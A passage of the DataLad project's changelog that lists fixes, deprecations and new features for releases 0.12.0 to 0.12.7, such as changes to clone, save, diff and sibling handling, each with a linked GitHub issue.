the `DataLad\n Handbook <http://handbook.datalad.org>`__ from DataLad’s\n documentation has been improved.\n (`#4046 <https://github.com/datalad/datalad/issues/4046>`__)\n\n- The ``--reckless`` parameter of\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n and\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n learned two new modes:\n\n - “ephemeral”, where the .git/annex/ of the cloned repository is\n symlinked to the local source repository’s.\n (`#4099 <https://github.com/datalad/datalad/issues/4099>`__)\n - “shared-{group|all|…}” that can be used to set up datasets for\n collaborative write access.\n (`#4324 <https://github.com/datalad/datalad/issues/4324>`__)\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n\n - learned to handle dataset aliases in RIA stores when given a URL\n of the form ``ria+<protocol>://<storelocation>#~<aliasname>``.\n (`#4459 <https://github.com/datalad/datalad/issues/4459>`__)\n - now checks ``datalad.get.subdataset-source-candidate-NAME`` to see\n if ``NAME`` starts with three digits, which is taken as a “cost”.\n Sources with lower costs will be tried first.\n (`#4619 <https://github.com/datalad/datalad/issues/4619>`__)\n\n- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n (`#4167 <https://github.com/datalad/datalad/issues/4167>`__)\n\n - learned to disallow non-fast-forward updates when ``ff-only`` is\n given to the ``--merge`` option.\n - gained a ``--follow`` option that controls how ``--merge``\n behaves, adding support for merging in the revision that is\n registered in the parent dataset rather than merging in the\n configured branch from the sibling.\n - now provides a result record for merge events.\n\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n now supports local paths as targets in addition to SSH URLs.\n (`#4187 <https://github.com/datalad/datalad/issues/4187>`__)\n\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n now\n\n - shows a warning if the caller requests to delete a sibling that\n does not exist.\n (`#4257 <https://github.com/datalad/datalad/issues/4257>`__)\n - phrases its warning about non-annex repositories in a less\n alarming way.\n (`#4323 <https://github.com/datalad/datalad/issues/4323>`__)\n\n- The rendering of command errors has been improved.\n (`#4157 <https://github.com/datalad/datalad/issues/4157>`__)\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n now\n\n - displays a message to signal that the working tree is clean,\n making it more obvious that no results being rendered corresponds\n to a clean state.\n (`#4106 <https://github.com/datalad/datalad/issues/4106>`__)\n - provides a stronger warning against using ``--to-git``.\n (`#4290 <https://github.com/datalad/datalad/issues/4290>`__)\n\n- `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n and\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n learned about scenarios where they could avoid unnecessary and\n expensive work.\n (`#4526 <https://github.com/datalad/datalad/issues/4526>`__)\n (`#4544 <https://github.com/datalad/datalad/issues/4544>`__)\n (`#4549 <https://github.com/datalad/datalad/issues/4549>`__)\n\n- Calling\n `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n without ``--recursive`` but with a path constraint within a\n subdataset (“/”) now traverses into the subdataset, as “/” would,\n restricting its report to “/”.\n (`#4235 <https://github.com/datalad/datalad/issues/4235>`__)\n\n- New option ``datalad.annex.retry`` controls how many times git-annex\n will retry on a failed transfer. It defaults to 3 and can be set to 0\n to restore the previous behavior.\n (`#4382 <https://github.com/datalad/datalad/issues/4382>`__)\n\n- `wtf <http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html>`__\n now warns when the specified dataset does not exist.\n (`#4331 <https://github.com/datalad/datalad/issues/4331>`__)\n\n- The ``repr`` and ``str`` output of the dataset and repo classes got a\n facelift.\n (`#4420 <https://github.com/datalad/datalad/issues/4420>`__)\n (`#4435 <https://github.com/datalad/datalad/issues/4435>`__)\n (`#4439 <https://github.com/datalad/datalad/issues/4439>`__)\n\n- The DataLad Singularity container now comes with p7zip-full.\n\n- DataLad emits a log message when the current working directory is\n resolved to a different location due to a symlink. This is now logged\n at the DEBUG rather than WARNING level, as it typically does not\n indicate a problem.\n (`#4426 <https://github.com/datalad/datalad/issues/4426>`__)\n\n- DataLad now lets the caller know that ``git annex init`` is scanning\n for unlocked files, as this operation can be slow in some\n repositories.\n (`#4316 <https://github.com/datalad/datalad/issues/4316>`__)\n\n- The ``log_progress`` helper learned how to set the starting point to\n a non-zero value and how to update the total of an existing progress\n bar, two features needed for planned improvements to how some\n commands display their progress.\n (`#4438 <https://github.com/datalad/datalad/issues/4438>`__)\n\n- The ``ExternalVersions`` object, which is used to check versions of\n Python modules and external tools (e.g., git-annex), gained an\n ``add`` method that enables DataLad extensions and other third-party\n code to include other programs of interest.\n (`#4441 <https://github.com/datalad/datalad/issues/4441>`__)\n\n- All of the remaining spots that use GitPython have been rewritten\n without it. Most notably, this includes rewrites of the ``clone``,\n ``fetch``, and ``push`` methods of ``GitRepo``.\n (`#4080 <https://github.com/datalad/datalad/issues/4080>`__)\n (`#4087 <https://github.com/datalad/datalad/issues/4087>`__)\n (`#4170 <https://github.com/datalad/datalad/issues/4170>`__)\n (`#4171 <https://github.com/datalad/datalad/issues/4171>`__)\n (`#4175 <https://github.com/datalad/datalad/issues/4175>`__)\n (`#4172 <https://github.com/datalad/datalad/issues/4172>`__)\n\n- When ``GitRepo.commit`` splits its operation across multiple calls to\n avoid exceeding the maximum command line length, it now amends to\n initial commit rather than creating multiple commits.\n (`#4156 <https://github.com/datalad/datalad/issues/4156>`__)\n\n- ``GitRepo`` gained a ``get_corresponding_branch`` method (which\n always returns None), allowing a caller to invoke the method without\n needing to check if the underlying repo class is ``GitRepo`` or\n ``AnnexRepo``.\n (`#4274 <https://github.com/datalad/datalad/issues/4274>`__)\n\n- A new helper function ``datalad.core.local.repo.repo_from_path``\n returns a repo class for a specified path.\n (`#4273 <https://github.com/datalad/datalad/issues/4273>`__)\n\n- New ``AnnexRepo`` method ``localsync`` performs a ``git annex sync``\n that disables external interaction and is particularly useful for\n propagating changes on an adjusted branch back to the main branch.\n (`#4243 <https://github.com/datalad/datalad/issues/4243>`__)\n\n0.12.7 (May 22, 2020) – .\n=========================\n\n.. _fixes-14:\n\nFixes\n-----\n\n- Requesting tailored output (``--output=tailored``) from a command\n with a custom result summary renderer produced repeated output.\n (`#4463 <https://github.com/datalad/datalad/issues/4463>`__)\n\n- A longstanding regression in argcomplete-based command-line\n completion for Bash has been fixed. You can enable completion by\n configuring a Bash startup file to run\n ``eval \"$(register-python-argcomplete datalad)\"`` or source\n DataLad’s ``tools/cmdline-completion``. The latter should work for\n Zsh as well.\n (`#4477 <https://github.com/datalad/datalad/issues/4477>`__)\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n didn’t prevent ``git-fetch`` from recursing into submodules, leading\n to a failure when the registered submodule was not present locally\n and the submodule did not have a remote named ‘origin’.\n (`#4560 <https://github.com/datalad/datalad/issues/4560>`__)\n\n- `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n botched path handling when the file name format started with “./” and\n the call was made from a subdirectory of the dataset.\n (`#4504 <https://github.com/datalad/datalad/issues/4504>`__)\n\n- Double dash options in manpages were unintentionally escaped.\n (`#4332 <https://github.com/datalad/datalad/issues/4332>`__)\n\n- The check for HTTP authentication failures crashed in situations\n where content came in as bytes rather than unicode.\n (`#4543 <https://github.com/datalad/datalad/issues/4543>`__)\n\n- A check in ``AnnexRepo.whereis`` could lead to a type error.\n (`#4552 <https://github.com/datalad/datalad/issues/4552>`__)\n\n- When installing a dataset to obtain a subdataset,\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n confusingly displayed a message that described the containing dataset\n as “underneath” the subdataset.\n (`#4456 <https://github.com/datalad/datalad/issues/4456>`__)\n\n- A couple of Makefile rules didn’t properly quote paths.\n (`#4481 <https://github.com/datalad/datalad/issues/4481>`__)\n\n- With DueCredit support enabled (``DUECREDIT_ENABLE=1``), the query\n for metadata information could flood the output with warnings if\n datasets didn’t have aggregated metadata. The warnings are now\n silenced, with the overall failure of a\n `metadata <http://datalad.readthedocs.io/en/latest/generated/man/datalad-metadata.html>`__\n call logged at the debug level.\n (`#4568 <https://github.com/datalad/datalad/issues/4568>`__)\n\n.. _enhancements-and-new-features-16:\n\nEnhancements and new features\n-----------------------------\n\n- The resource identifier helper learned to recognize URLs with\n embedded Git transport information, such as\n gcrypt::https://example.com.\n (`#4529 <https://github.com/datalad/datalad/issues/4529>`__)\n\n- When running non-interactively, a more informative error is now\n signaled when the UI backend, which cannot display a question, is\n asked to do so.\n (`#4553 <https://github.com/datalad/datalad/issues/4553>`__)\n\n0.12.6 (April 23, 2020) – .\n===========================\n\n.. _major-refactoring-and-deprecations-2:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- The value of ``datalad.support.annexrep.N_AUTO_JOBS`` is no longer\n considered. The variable will be removed in a later release.\n (`#4409 <https://github.com/datalad/datalad/issues/4409>`__)\n\n.. _fixes-15:\n\nFixes\n-----\n\n- Staring with v0.12.0, ``datalad save`` recorded the current branch of\n a parent dataset as the ``branch`` value in the .gitmodules entry for\n a subdataset. This behavior is problematic for a few reasons and has\n been reverted.\n (`#4375 <https://github.com/datalad/datalad/issues/4375>`__)\n\n- The default for the ``--jobs`` option, “auto”, instructed DataLad to\n pass a value to git-annex’s ``--jobs`` equal to\n ``min(8, max(3, <number of CPUs>))``, which could lead to issues\n due to the large number of child processes spawned and file\n descriptors opened. To avoid this behavior, ``--jobs=auto`` now\n results in git-annex being called with ``--jobs=1`` by default.\n Configure the new option ``datalad.runtime.max-annex-jobs`` to\n control the maximum value that will be considered when\n ``--jobs='auto'``.\n (`#4409 <https://github.com/datalad/datalad/issues/4409>`__)\n\n- Various commands have been adjusted to better handle the case where a\n remote’s HEAD ref points to an unborn branch.\n (`#4370 <https://github.com/datalad/datalad/issues/4370>`__)\n\n- `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n\n - learned to use the query as a regular expression that restricts\n the keys that are shown for ``--show-keys short``.\n (`#4354 <https://github.com/datalad/datalad/issues/4354>`__)\n - gives a more helpful message when query is an invalid regular\n expression.\n (`#4398 <https://github.com/datalad/datalad/issues/4398>`__)\n\n- The code for parsing Git configuration did not follow Git’s behavior\n of accepting a key with no value as shorthand for key=true.\n (`#4421 <https://github.com/datalad/datalad/issues/4421>`__)\n\n- ``AnnexRepo.info`` needed a compatibility update for a change in how\n git-annex reports file names.\n (`#4431 <https://github.com/datalad/datalad/issues/4431>`__)\n\n- `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__\n did not gracefully handle a token that did not have the necessary\n permissions.\n (`#4400 <https://github.com/datalad/datalad/issues/4400>`__)\n\n.. _enhancements-and-new-features-17:\n\nEnhancements and new features\n-----------------------------\n\n- `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n learned to use the query as a regular expression that restricts the\n keys that are shown for ``--show-keys short``.\n (`#4354 <https://github.com/datalad/datalad/issues/4354>`__)\n\n- ``datalad <subcommand>`` learned to point to the\n `datalad-container <https://github.com/datalad/datalad-container>`__\n extension when a subcommand from that extension is given but the\n extension is not installed.\n (`#4400 <https://github.com/datalad/datalad/issues/4400>`__)\n (`#4174 <https://github.com/datalad/datalad/issues/4174>`__)\n\n0.12.5 (Apr 02, 2020) – a small step for datalad …\n==================================================\n\nFix some bugs and make the world an even better place.\n\n.. _fixes-16:\n\nFixes\n-----\n\n- Our ``log_progress`` helper mishandled the initial display and step\n of the progress bar.\n (`#4326 <https://github.com/datalad/datalad/issues/4326>`__)\n\n- ``AnnexRepo.get_content_annexinfo`` is designed to accept\n ``init=None``, but passing that led to an error.\n (`#4330 <https://github.com/datalad/datalad/issues/4330>`__)\n\n- Update a regular expression to handle an output change in Git\n v2.26.0. (`#4328 <https://github.com/datalad/datalad/issues/4328>`__)\n\n- We now set ``LC_MESSAGES`` to ‘C’ while running git to avoid failures\n when parsing output that is marked for translation.\n (`#4342 <https://github.com/datalad/datalad/issues/4342>`__)\n\n- The helper for decoding JSON streams loaded the last line of input\n without decoding it if the line didn’t end with a new line, a\n regression introduced in the 0.12.0 release.\n (`#4361 <https://github.com/datalad/datalad/issues/4361>`__)\n\n- The clone command failed to git-annex-init a fresh clone whenever it\n considered to add the origin of the origin as a remote.\n (`#4367 <https://github.com/datalad/datalad/issues/4367>`__)\n\n0.12.4 (Mar 19, 2020) – Windows?!\n=================================\n\nThe main purpose of this release is to have one on PyPi that has no\nassociated wheel to enable a working installation on Windows\n(`#4315 <https://github.com/datalad/datalad/issues/4315>`__).\n\n.. _fixes-17:\n\nFixes\n-----\n\n- The description of the ``log.outputs`` config switch did not keep up\n with code changes and incorrectly stated that the output would be\n logged at the DEBUG level; logging actually happens at a lower level.\n (`#4317 <https://github.com/datalad/datalad/issues/4317>`__)\n\n0.12.3 (March 16, 2020) – .\n===========================\n\nUpdates for compatibility with the latest git-annex, along with a few\nmiscellaneous fixes\n\n.. _major-refactoring-and-deprecations-3:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- All spots that raised a ``NoDatasetArgumentFound`` exception now\n raise a ``NoDatasetFound`` exception to better reflect the situation:\n it is the *dataset* rather than the *argument* that is not found. For\n compatibility, the latter inherits from the former, but new code\n should prefer the latter.\n (`#4285 <https://github.com/datalad/datalad/issues/4285>`__)\n\n.. _fixes-18:\n\nFixes\n-----\n\n- Updates for compatibility with git-annex version 8.20200226.\n (`#4214 <https://github.com/datalad/datalad/issues/4214>`__)\n\n- ``datalad export-to-figshare`` failed to export if the generated\n title was fewer than three characters. It now queries the caller for\n the title and guards against titles that are too short.\n (`#4140 <https://github.com/datalad/datalad/issues/4140>`__)\n\n- Authentication was requested multiple times when git-annex launched\n parallel downloads from the ``datalad`` special remote.\n (`#4308 <https://github.com/datalad/datalad/issues/4308>`__)\n\n- At verbose logging levels, DataLad requests that git-annex display\n debugging information too. Work around a bug in git-annex that\n prevented that from happening.\n (`#4212 <https://github.com/datalad/datalad/issues/4212>`__)\n\n- The internal command runner looked in the wrong place for some\n configuration variables, including ``datalad.log.outputs``, resulting\n in the default value always being used.\n (`#4194 <https://github.com/datalad/datalad/issues/4194>`__)\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n failed when trying to publish to a git-lfs special remote for the\n first time.\n (`#4200 <https://github.com/datalad/datalad/issues/4200>`__)\n\n- ``AnnexRepo.set_remote_url`` is supposed to establish shared SSH\n connections but failed to do so.\n (`#4262 <https://github.com/datalad/datalad/issues/4262>`__)\n\n.. _enhancements-and-new-features-18:\n\nEnhancements and new features\n-----------------------------\n\n- The message provided when a command cannot determine what dataset to\n operate on has been improved.\n (`#4285 <https://github.com/datalad/datalad/issues/4285>`__)\n\n- The “aws-s3” authentication type now allows specifying the host\n through “aws-s3_host”, which was needed to work around an\n authorization error due to a longstanding upstream bug.\n (`#4239 <https://github.com/datalad/datalad/issues/4239>`__)\n\n- The xmp metadata extractor now recognizes “.wav” files.\n\n0.12.2 (Jan 28, 2020) – Smoothen the ride\n=========================================\n\nMostly a bugfix release with various robustifications, but also makes\nthe first step towards versioned dataset installation requests.\n\n.. _major-refactoring-and-deprecations-4:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- The minimum required version for GitPython is now 2.1.12.\n (`#4070 <https://github.com/datalad/datalad/issues/4070>`__)\n\n.. _fixes-19:\n\nFixes\n-----\n\n- The class for handling configuration values, ``ConfigManager``,\n inappropriately considered the current working directory’s dataset,\n if any, for both reading and writing when instantiated with\n ``dataset=None``. This misbehavior is fairly inaccessible through\n typical use of DataLad. It affects ``datalad.cfg``, the top-level\n configuration instance that should not consider repository-specific\n values. It also affects Python users that call ``Dataset`` with a\n path that does not yet exist and persists until that dataset is\n created. (`#4078 <https://github.com/datalad/datalad/issues/4078>`__)\n\n- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n saved the dataset when called with ``--merge``, which is unnecessary\n and risks committing unrelated changes.\n (`#3996 <https://github.com/datalad/datalad/issues/3996>`__)\n\n- Confusing and irrelevant information about Python defaults have been\n dropped from the command-line help.\n (`#4002 <https://github.com/datalad/datalad/issues/4002>`__)\n\n- The logic for automatically propagating the ‘origin’ remote when\n cloning a local source didn’t properly account for relative paths.\n (`#4045 <https://github.com/datalad/datalad/issues/4045>`__)\n\n- Various fixes to file name handling and quoting on Windows.\n (`#4049 <https://github.com/datalad/datalad/issues/4049>`__)\n (`#4050 <https://github.com/datalad/datalad/issues/4050>`__)\n\n- When cloning failed, error lines were not bubbled up to the user in\n some scenarios.\n (`#4060 <https://github.com/datalad/datalad/issues/4060>`__)\n\n.. _enhancements-and-new-features-19:\n\nEnhancements and new features\n-----------------------------\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n (and thus\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__)\n\n - now propagates the ``reckless`` mode from the superdataset when\n cloning a dataset into it.\n (`#4037 <https://github.com/datalad/datalad/issues/4037>`__)\n - gained support for ``ria+<protocol>://`` URLs that point to\n `RIA <http://handbook.datalad.org/en/latest/usecases/datastorage_for_institutions.html>`__\n stores.\n (`#4022 <https://github.com/datalad/datalad/issues/4022>`__)\n - learned to read “@version” from ``ria+`` URLs and install that\n version of a dataset\n (`#4036 <https://github.com/datalad/datalad/issues/4036>`__) and\n to apply URL rewrites configured through Git’s ``url.*.insteadOf``\n mechanism\n (`#4064 <https://github.com/datalad/datalad/issues/4064>`__).\n - now copies ``datalad.get.subdataset-source-candidate-<name>``\n options configured within the superdataset into the subdataset.\n This is particularly useful for RIA data stores.\n (`#4073 <https://github.com/datalad/datalad/issues/4073>`__)\n\n- Archives are now (optionally) handled with 7-Zip instead of\n ``patool``. 7-Zip will be used by default, but ``patool`` will be\n used on non-Windows systems if the ``datalad.runtime.use-patool``\n option is set or the ``7z`` executable is not found.\n (`#4041 <https://github.com/datalad/datalad/issues/4041>`__)\n\n0.12.1 (Jan 15, 2020) – Small bump after big bang\n=================================================\n\nFix some fallout after major release.\n\n.. _fixes-20:\n\nFixes\n-----\n\n- Revert incorrect relative path adjustment to URLs in\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__.\n (`#3538 <https://github.com/datalad/datalad/issues/3538>`__)\n\n- Various small fixes to internal helpers and test to run on Windows\n (`#2566 <https://github.com/datalad/datalad/issues/2566>`__)\n (`#2534 <https://github.com/datalad/datalad/issues/2534>`__)\n\n0.12.0 (Jan 11, 2020) – Krakatoa\n================================\n\nThis release is the result of more than a year of development that\nincludes fixes for a large number of issues, yielding more robust\nbehavior across a wider range of use cases, and introduces major changes\nin API and behavior. It is the first release for which extensive user\ndocumentation is available in a dedicated `DataLad\nHandbook <http://handbook.datalad.org>`__. Python 3 (3.5 and later) is\nnow the only supported Python flavor.\n\nMajor changes 0.12 vs 0.11\n--------------------------\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n fully replaces\n `add <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html>`__\n (which is obsolete now, and will be removed in a future release).\n\n- A new Git-annex aware\n `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n command enables detailed inspection of dataset hierarchies. The\n previously available\n `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n command has been adjusted to match\n `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n in argument semantics and behavior.\n\n- The ability to configure dataset procedures prior and after the\n execution of particular commands has been replaced by a flexible\n “hook” mechanism that is able to run arbitrary DataLad commands\n whenever command results are detected that match a specification.\n\n- Support of the Windows platform has been improved substantially.\n While performance and feature coverage on Windows still falls behind\n Unix-like systems, typical data consumer use cases, and standard\n dataset operations, such as\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__\n and\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__,\n are now working. Basic support for data provenance capture via\n `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n is also functional.\n\n- Support for Git-annex direct mode repositories has been removed,\n following the end of support in Git-annex itself.\n\n- The semantics of relative paths in command line arguments have\n changed. Previously, a call\n ``datalad save --dataset /tmp/myds some/relpath`` would have been\n interpreted as saving a file at ``/tmp/myds/some/relpath`` into\n dataset ``/tmp/myds``. This has changed to saving\n ``$PWD/some/relpath`` into dataset ``/tmp/myds``. More generally,\n relative paths are now always treated as relative to the current\n working directory, except for path arguments of\n `Dataset <http://docs.datalad.org/en/latest/generated/datalad.api.Dataset.html>`__\n class instance methods of the Python API. The resulting partial\n duplication of path specifications between path and dataset arguments\n is mitigated by the introduction of two special symbols that can be\n given as dataset argument: ``^`` and ``^.``, which identify the\n topmost superdataset and the closest dataset that contains the\n working directory, respectively.\n\n- The concept of a “core API” has been introduced. Commands situated in\n the module ``datalad.core`` (such as\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__,\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__,\n `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__,\n `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__,\n `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__)\n receive additional scrutiny regarding API and implementation, and are\n meant to provide longer-term stability. Application developers are\n encouraged to preferentially build on these commands.\n\nMajor refactoring and deprecations since 0.12.0rc6\n--------------------------------------------------\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n has been incorporated into the growing core API. The public\n ``--alternative-source`` parameter has been removed, and a\n ``clone_dataset`` function with multi-source capabilities is provided\n instead. The ``--reckless`` parameter can now take literal mode\n labels instead of just being a binary flag, but backwards\n compatibility is maintained.\n\n- The ``get_file_content`` method of ``GitRepo`` was no longer used\n internally or in any known DataLad extensions and has been removed.\n (`#3812 <https://github.com/datalad/datalad/issues/3812>`__)\n\n- The function ``get_dataset_root`` has been replaced by\n ``rev_get_dataset_root``. ``rev_get_dataset_root`` remains as a\n compatibility alias and will be removed in a later release.\n (`#3815 <https://github.com/datalad/datalad/issues/3815>`__)\n\n- The ``add_sibling`` module, marked obsolete in v0.6.0, has been\n removed. (`#3871 <https://github.com/datalad/datalad/issues/3871>`__)\n\n- ``mock`` is no longer declared as an external dependency because we\n can rely on it being in the standard library now that our minimum\n required Python version is 3.5.\n (`#3860 <https://github.com/datalad/datalad/issues/3860>`__)\n\n- `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n now requires that directories be indicated with a trailing slash\n rather than interpreting a path as directory when it doesn’t exist.\n This avoids confusion that can result from typos and makes it\n possible to support directory targets that do not exist.\n (`#3854 <https://github.com/datalad/datalad/issues/3854>`__)\n\n- The ``dataset_only`` argument of the ``ConfigManager`` class is\n deprecated. Use ``source=\"dataset\"`` instead.\n (`#3907 <https://github.com/datalad/datalad/issues/3907>`__)\n\n- The ``--proc-pre`` and ``--proc-post`` options have been removed, and\n configuration values for ``datalad.COMMAND.proc-pre`` and\n ``datalad.COMMAND.proc-post`` are no longer honored. The new result\n hook mechanism provides an alternative for ``proc-post`` procedures.\n (`#3963 <https://github.com/datalad/datalad/issues/3963>`__)\n\nFixes since 0.12.0rc6\n---------------------\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n crashed when called with a detached HEAD. It now aborts with an\n informative message.\n (`#3804 <https://github.com/datalad/datalad/issues/3804>`__)\n\n- Since 0.12.0rc6 the call to\n `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n in\n `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n resulted in a spurious warning.\n (`#3877 <https://github.com/datalad/datalad/issues/3877>`__)\n\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n crashed if it encountered an annex repository that was marked as\n dead. (`#3892 <https://github.com/datalad/datalad/issues/3892>`__)\n\n- The update of\n `rerun <https://datalad.readthedocs.io/en/latest/generated/man/datalad-rerun.html>`__\n in v0.12.0rc3 for the rewritten\n `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n command didn’t account for a change in the output of ``diff``,\n leading to ``rerun --report`` unintentionally including unchanged\n files in its diff values.\n (`#3873 <https://github.com/datalad/datalad/issues/3873>`__)\n\n- In 0.12.0rc5\n `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n was updated to follow the new path handling logic, but its calls to\n AnnexRepo weren’t properly adjusted, resulting in incorrect path\n handling when the called from a dataset subdirectory.\n (`#3850 <https://github.com/datalad/datalad/issues/3850>`__)\n\n- `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n called ``git annex addurl`` in a way that failed to register a URL\n when its header didn’t report the content size.\n (`#3911 <https://github.com/datalad/datalad/issues/3911>`__)\n\n- With Git v2.24.0, saving new subdatasets failed due to a bug in that\n Git release.\n (`#3904 <https://github.com/datalad/datalad/issues/3904>`__)\n\n- With DataLad configured to stop on failure (e.g., specifying\n ``--on-failure=stop`` from the command line), a failing result record\n was not rendered.\n (`#3863 <https://github.com/datalad/datalad/issues/3863>`__)\n\n- Installing a subdataset yielded an “ok” status in cases where the\n repository was not yet in its final state, making it ineffective for\n a caller to operate on the repository in response to the result.\n (`#3906 <https://github.com/datalad/datalad/issues/3906>`__)\n\n- The internal helper for converting git-annex’s JSON output did not\n relay information from the “error-messages” field.\n (`#3931 <https://github.com/datalad/datalad/issues/3931>`__)\n\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n reported relative paths that were confusingly not relative to the\n current directory in some cases. It now always reports absolute\n paths. (`#3959 <https://github.com/datalad/datalad/issues/3959>`__)\n\n- `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n inappropriately reported files as deleted in some cases when ``to``\n was a value other than ``None``.\n (`#3999 <https://github.com/datalad/datalad/issues/3999>`__)\n\n- An assortment of fixes for Windows compatibility.\n (`#3971 <https://github.com/datalad/datalad/issues/3971>`__)\n (`#3974 <https://github.com/datalad/datalad/issues/3974>`__)\n (`#3975 <https://github.com/datalad/datalad/issues/3975>`__)\n (`#3976 <https://github.com/datalad/datalad/issues/3976>`__)\n (`#3979 <https://github.com/datalad/datalad/issues/3979>`__)\n\n- Subdatasets installed from a source given by relative path will now\n have this relative path used as ‘url’ in their .gitmodules record,\n instead of an absolute path generated by Git.\n (`#3538 <https://github.com/datalad/datalad/issues/3538>`__)\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n will now correctly interpret ‘~/…’ paths as absolute path\n specifications.\n (`#3958 <https://github.com/datalad/datalad/issues/3958>`__)\n\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n mistakenly reported a directory as a procedure.\n (`#3793 <https://github.com/datalad/datalad/issues/3793>`__)\n\n- The cleanup for batched git-annex processes has been improved.\n (`#3794 <https://github.com/datalad/datalad/issues/3794>`__)\n (`#3851 <https://github.com/datalad/datalad/issues/3851>`__)\n\n- The function for adding a version ID to an AWS S3 URL doesn’t support\n URLs with an “s3://” scheme and raises a ``NotImplementedError``\n exception when it encounters one. The function learned to return a\n URL untouched if an “s3://” URL comes in with a version ID.\n (`#3842 <https://github.com/datalad/datalad/issues/3842>`__)\n\n- A few spots needed to be adjusted for compatibility with git-annex’s\n new ``--sameas``\n `feature <https://git-annex.branchable.com/tips/multiple_remotes_accessing_the_same_data_store/>`__,\n which allows special remotes to share a data store.\n (`#3856 <https://github.com/datalad/datalad/issues/3856>`__)\n\n- The ``swallow_logs`` utility failed to capture some log messages due\n to an incompatibility with Python 3.7.\n (`#3935 <https://github.com/datalad/datalad/issues/3935>`__)\n\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n\n - crashed if ``--inherit`` was passed but the parent dataset did not\n have a remote with a matching name.\n (`#3954 <https://github.com/datalad/datalad/issues/3954>`__)\n - configured the wrong pushurl and annexurl values in some cases.\n (`#3955 <https://github.com/datalad/datalad/issues/3955>`__)\n\nEnhancements and new features since 0.12.0rc6\n---------------------------------------------\n\n- By default, datasets cloned from local source paths will now get a\n configured remote for any recursively discoverable ‘origin’ sibling\n that is also available from a local path in order to maximize\n automatic file availability across local annexes.\n (`#3926 <https://github.com/datalad/datalad/issues/3926>`__)\n\n- The new `result hooks\n mechanism <http://handbook.datalad.org/en/latest/basics/101-145-hooks.html>`__\n allows callers to specify, via local Git configuration values,\n DataLad command calls that will be triggered in response to matching\n result records (i.e., what you see when you call a command with\n ``-f json_pp``).\n (`#3903 <https://github.com/datalad/datalad/issues/3903>`__)\n\n- The command interface classes learned to use a new ``_examples_``\n attribute to render documentation examples for both the Python and\n command-line API.\n (`#3821 <https://github.com/datalad/datalad/issues/3821>`__)\n\n- Candidate URLs for cloning a submodule can now be generated based on\n configured templates that have access to various properties of the\n submodule, including its dataset ID.\n (`#3828 <https://github.com/datalad/datalad/issues/3828>`__)\n\n- DataLad’s check that the user’s Git identity is configured has been\n sped up and now considers the appropriate environment variables as\n well. (`#3807 <https://github.com/datalad/datalad/issues/3807>`__)\n\n- The ``tag`` method of ``GitRepo`` can now tag revisions other than\n ``HEAD`` and accepts a list of arbitrary ``git tag`` options.\n (`#3787 <https://github.com/datalad/datalad/issues/3787>`__)\n\n- When ``get`` clones a subdataset and the subdataset’s HEAD differs\n from the commit that is registered in the parent, the active branch\n of the 